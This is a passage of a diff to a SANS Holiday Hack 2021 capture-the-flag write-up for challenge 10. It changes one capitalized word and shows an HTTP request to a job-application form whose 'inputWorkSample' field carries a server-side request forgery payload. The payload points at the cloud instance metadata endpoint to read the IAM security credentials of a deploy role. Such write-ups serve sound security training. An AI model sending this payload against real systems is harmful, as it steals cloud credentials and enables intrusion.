damaratix/sans-holiday-hack-2021/sources/challenge10.md

 ```

 ### SecretAccessKey
-and if we applied what we learnt in the prechallenge about `IMDS 1` and `security-credentials`.
+And if we applied what we learnt in the prechallenge about `IMDS 1` and `security-credentials`.
 ```
 GET /?inputName=aa&inputEmail=aa%40me.it&inputPhone=aa&inputField=Bedtime+violation&resumeFile=&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role&additionalInformation=
 Host: apply.jackfrosttower.com